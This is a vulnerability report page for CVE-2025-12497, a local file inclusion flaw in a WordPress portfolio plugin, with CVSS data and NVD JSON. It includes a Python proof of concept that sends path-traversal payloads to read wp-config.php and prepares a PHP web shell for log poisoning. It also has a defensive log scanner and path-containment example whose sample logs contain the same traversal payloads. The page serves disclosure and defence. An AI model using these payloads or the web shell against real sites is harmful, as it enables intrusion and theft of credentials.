Security Vulnerability Report
CVE-2025-12497 CVSS 8.1 HIGH

Published: 2025-11-05 12:15:33
Last Modified: 2026-04-15 00:35:42

Description

The Premium Portfolio Features for Phlox theme plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.3.10 via the 'args[extra_template_path]' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is available from NVD for this entry. Affected range according to the description (all versions up to and including 2.3.10):

Premium Portfolio Features for Phlox ≤ 2.3.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import base64

# CVE-2025-12497 LFI PoC
# Target: Premium Portfolio Features for Phlox theme plugin (<= 2.3.10)
# Vulnerability: Local File Inclusion via args[extra_template_path]
#
# Note: this PoC sends the parameter to the site root. The advisory does not
# name the request path the plugin handles, so target_url must be adjusted to
# the endpoint that actually reads args[extra_template_path].

target_url = "http://target-wordpress-site.com/"

# Step 1: probe the LFI with a traversal to wp-config.php.
# Caveat: the vulnerable code include()s the path, so PHP in the target file
# is executed rather than echoed; wp-config.php will not print DB_NAME into
# the response. The "define" check below also matches inline JavaScript on
# ordinary pages, so compare the response against a baseline request rather
# than trusting a single keyword match.
print("[*] Testing LFI vulnerability...")
lfi_payload = "../../../../wp-config.php"
params = {"args[extra_template_path]": lfi_payload}
try:
    response = requests.get(target_url, params=params, timeout=10)
    if "DB_NAME" in response.text or "define" in response.text:
        print("[+] LFI confirmed! Sensitive file contents retrieved.")
        print(response.text[:500])
    else:
        print(f"[-] No keyword match (HTTP {response.status_code}); diff against a baseline request.")
except requests.RequestException as e:
    print(f"[-] Request failed: {e}")

# Step 2: log poisoning setup. The PoC as published stops here: it prepares
# the payload but never writes the shell into the log or includes the log.
# Caveat: base64-encoding the shell does not bypass anything in this
# scenario; a base64 string written to access.log is inert unless something
# decodes it before the include.
webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"
encoded_webshell = base64.b64encode(webshell.encode()).decode()
log_poison_payload = "../../../../../../var/log/apache2/access.log"
params_poison = {"args[extra_template_path]": log_poison_payload}
print(f"[*] Attempting log poisoning with encoded shell: {encoded_webshell[:30]}...")
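
Two things a defender wants from this advisory are a way to find exploitation attempts in web-server logs and a clear picture of the control that closes the bug (canonicalise the requested path and refuse anything that resolves outside the template directory, the CWE-98 fix pattern). The following is an added example written for this page; it is not the plugin's code, not its patch, and not part of the PoC above. The access-log lines, the request path (site root, mirroring the PoC), the template directory and all function names are constructed assumptions.

```python
"""Detection and containment helpers for CVE-2025-12497-style LFI payloads.

Added example for this page: not the plugin's code or patch. The log lines,
the request path and the template directory below are constructed.
"""
import os
import re
from typing import List, Dict, Optional
from urllib.parse import urlsplit, parse_qs, unquote

PARAM = "args[extra_template_path]"

# Constructed Apache combined-format log lines: two traversal attempts
# (the second one double-encoded), one legitimate template name, one
# unrelated request.
SAMPLE_LOG = """\
203.0.113.10 - - [06/Nov/2025:10:01:02 +0000] "GET /?args%5Bextra_template_path%5D=..%2F..%2F..%2F..%2Fwp-config.php HTTP/1.1" 200 512 "-" "python-requests/2.32"
203.0.113.10 - - [06/Nov/2025:10:01:05 +0000] "GET /?args%5Bextra_template_path%5D=%252e%252e%2F%252e%252e%2Fvar%2Flog%2Fapache2%2Faccess.log HTTP/1.1" 200 40 "-" "python-requests/2.32"
198.51.100.7 - - [06/Nov/2025:10:02:11 +0000] "GET /?args%5Bextra_template_path%5D=portfolio%2Fgrid.php HTTP/1.1" 200 9012 "-" "Mozilla/5.0"
198.51.100.7 - - [06/Nov/2025:10:02:12 +0000] "GET /wp-login.php HTTP/1.1" 200 3021 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """URL-decode until stable so %252e%252e (double-encoded '..') is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_lfi_payload(value: str) -> bool:
    """True when the template path looks like traversal, an absolute path,
    a stream wrapper (php://, file://, data://) or contains a NUL byte."""
    v = fully_decode(value).replace("\\", "/")
    if ".." in v.split("/"):
        return True
    if v.startswith("/"):
        return True
    if re.match(r"^[a-z][a-z0-9+.-]*://", v, re.I):
        return True
    return "\x00" in v


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one record per request whose args[extra_template_path] is suspicious."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        # parse_qs decodes the bracketed parameter name as well as the value
        params = parse_qs(query, keep_blank_values=True)
        for raw in params.get(PARAM, []):
            if is_lfi_payload(raw):
                hits.append({
                    "ip": m["ip"],
                    "ts": m["ts"],
                    "status": int(m["status"]),
                    "payload": fully_decode(raw),
                })
    return hits


def resolve_template_path(template_dir: str, requested: str) -> Optional[str]:
    """Hardened resolver (the CWE-98 fix pattern, shown here in Python):
    canonicalise the joined path and require it to stay inside template_dir.
    Returns None for anything that escapes or is not a .php template."""
    base = os.path.realpath(template_dir)
    # os.path.join discards base when `requested` is absolute, which is why
    # the containment check below is done on the resolved result.
    candidate = os.path.realpath(os.path.join(base, fully_decode(requested)))
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not candidate.endswith(".php"):
        return None
    return candidate


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} HTTP {hit['status']} -> {hit['payload']}")
    tpl = "/srv/wp/wp-content/plugins/auxin-portfolio/templates"  # constructed
    for req in ("portfolio/grid.php", "../../../../wp-config.php", "/etc/passwd"):
        print(f"{req!r:40} -> {resolve_template_path(tpl, req)}")
```

`scan_log` flags both requests from 203.0.113.10 and ignores the legitimate `portfolio/grid.php` lookup; `resolve_template_path` accepts that same legitimate name and returns None for the traversal and absolute-path payloads, which is the property the plugin's include path needs to have. The HTTP status in each hit is kept because a 200 on a traversal request is the line worth triaging first.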

References

https://plugins.trac.wordpress.org/changeset/3388727/auxin-portfolio (plugin changeset on the WordPress.org SVN, cited by NVD)
https://www.wordfence.com/threat-intel/vulnerabilities/id/518abad2-d3cc-4d15-83d2-8fd99d30500c?source=cve (Wordfence vulnerability record)

Weakness: CWE-98 (Improper Control of Filename for Include/Require Statement in PHP Program)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12497", "sourceIdentifier": "[email protected]", "published": "2025-11-05T12:15:33.347", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Premium Portfolio Features for Phlox theme plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.3.10 via the 'args[extra_template_path]' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3388727/auxin-portfolio", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/518abad2-d3cc-4d15-83d2-8fd99d30500c?source=cve", "source": "[email protected]"}]}}